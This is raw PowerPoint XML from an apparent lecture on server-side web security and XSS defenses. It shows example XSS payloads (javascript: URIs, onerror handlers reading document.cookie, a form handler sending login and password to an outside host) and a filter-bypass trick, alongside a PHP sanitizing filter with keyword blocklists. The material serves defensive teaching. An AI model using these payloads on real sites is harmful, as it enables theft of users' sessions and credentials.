        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>JavaScript as scheme in URI</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>=“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>javascript:alert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>);”&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> JavaScript On{event} attributes (handlers)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>OnSubmit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>OnError</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>OnLoad</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>, …</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> Typical use:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>=“none” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>OnError</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>=“alert(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>)”&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>iframe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>=`https://bank.com/login` </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>onload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>=`steal()`&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>&lt;form&gt; action="logon.jsp" method="post"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>onsubmit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>hackImg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>=new Image;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>    hackImg.src='http://www.digicrime.com/'+document.for</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>    ms(1).</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>login.value</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>'+':'+</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>document.forms</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>(1).</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>password.value</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>;" &lt;/form&gt;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ChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1905000" y="2667000"/>
            <a:ext cx="2343150" cy="476251"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln w="12700" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="lg" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="40458C"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="52227" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1924050" y="4095749"/>
            <a:ext cx="3257550" cy="476251"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln w="12700" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="lg" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="40458C"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="52228" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Problems with filters</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="52229" name="Content Placeholder 2" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Suppose a filter removes &lt;script</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Good case</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>&lt;script </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>=“ ...”  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:sym typeface="Symbol" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:sym typeface="Symbol" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:sym typeface="Symbol" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t>=“...”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:sym typeface="Symbol" pitchFamily="18" charset="2"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:sym typeface="Symbol" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t>But then</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:sym typeface="Symbol" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:sym typeface="Symbol" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t>scr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:sym typeface="Symbol" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:sym typeface="Symbol" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t>scriptipt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:sym typeface="Symbol" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>=“ ...”  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:sym typeface="Symbol" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>&lt;script </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>=“ ...”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Pretty good filter</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="53251" name="Content Placeholder 2" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="1295400"/>
            <a:ext cx="8991600" cy="5410200"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" smtClean="0"/>
              <a:t>function RemoveXSS($val) { </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" smtClean="0"/>
              <a:t>   // this prevents some character re-spacing such as &lt;java\0script&gt; </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" smtClean="0"/>
              <a:t>   $val = preg_replace('/([\x00-\x08,\x0b-\x0c,\x0e-\x19])/', '', $val); </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" smtClean="0"/>
              <a:t>   // straight replacements ... prevents strings like &lt;IMG SRC=&amp;#X40&amp;#X61&amp;#X76&amp;#X61&amp;#X73&amp;#X63&amp;#X72&amp;#X69&amp;#X70&amp;#X74&amp;#X3A &amp;#X61&amp;#X6C&amp;#X65&amp;#X72&amp;#X74&amp;#X28&amp;#X27&amp;#X58&amp;#X53&amp;#X53&amp;#X27&amp;#X29&gt; </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" smtClean="0"/>
              <a:t>   $search = 'abcdefghijklmnopqrstuvwxyz'; </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" smtClean="0"/>
              <a:t>   $search .= 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'; </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" smtClean="0"/>
              <a:t>   $search .= '1234567890!@#$%^&amp;*()'; </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" smtClean="0"/>
              <a:t>   $search .= '~`";:?+/={}[]-_|\'\\'; </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" smtClean="0"/>
              <a:t>   for ($i = 0; $i &lt; strlen($search); $i++) { </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" smtClean="0"/>
              <a:t>      $val = preg_replace('/(&amp;#[xX]0{0,8}'.dechex(ord($search[$i])).';?)/i', $search[$i], $val); </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" smtClean="0"/>
              <a:t>      $val = preg_replace('/(&amp;#0{0,8}'.ord($search[$i]).';?)/', $search[$i], $val); // with a ; </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" smtClean="0"/>
              <a:t>   }     </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" smtClean="0"/>
              <a:t>   $ra1 = Array('javascript', 'vbscript', 'expression', 'applet', ...); </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" smtClean="0"/>
              <a:t>   $ra2 = Array('onabort', 'onactivate', 'onafterprint', 'onafterupdate', ...); </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" smtClean="0"/>
              <a:t>   $ra = array_merge($ra1, $ra2); </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" smtClean="0"/>
              <a:t>   $found = true; // keep replacing as long as the previous round replaced something </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" smtClean="0"/>
              <a:t>   while ($found == true) { ...} </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" smtClean="0"/>
              <a:t>   return $val; </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" smtClean="0"/>
              <a:t>} </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="53252" name="TextBox 3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3205165" y="6400800"/>
            <a:ext cx="5391541" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="660066"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://kallahar.com/smallprojects/php_xss_filter_function.php</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38189</TotalTime>
  <Words>886</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>133</Paragraphs>
  <Slides>16</Slides>
  <Notes>2</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Acrobat Document</vt:lpstr>
      <vt:lpstr>Module 6.4</vt:lpstr>
      <vt:lpstr>Defenses at server</vt:lpstr>
      <vt:lpstr>How to Protect Yourself (OWASP)</vt:lpstr>
      <vt:lpstr>Input data validation and filtering</vt:lpstr>
      <vt:lpstr>Output filtering / encoding</vt:lpstr>
      <vt:lpstr>ASP.NET output filtering</vt:lpstr>
      <vt:lpstr>Caution: Scripts not only in &lt;script&gt;!</vt:lpstr>
      <vt:lpstr>Problems with filters</vt:lpstr>
      <vt:lpstr>Pretty good filter</vt:lpstr>
      <vt:lpstr>But watch out for tricky cases</vt:lpstr>
      <vt:lpstr>Advanced anti-XSS tools</vt:lpstr>
      <vt:lpstr>Client-side XSS defenses</vt:lpstr>
      <vt:lpstr>HttpOnly Cookies     IE6 SP1,   FF2.0.0.5</vt:lpstr>
      <vt:lpstr>IE XSS Filter</vt:lpstr>
      <vt:lpstr>Complex problems in social network sites</vt:lpstr>
      <vt:lpstr>Points to remember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Web Server Side Security</dc:title>
  <dc:creator>cse</dc:creator>
  <cp:lastModifiedBy>Deepak Kumar</cp:lastModifiedBy>
  <cp:revision>3776</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2016-03-11T05:13:48Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2017-03-19T16:57:16Z</dcterms:modified>
</cp:coreProperties>
</file>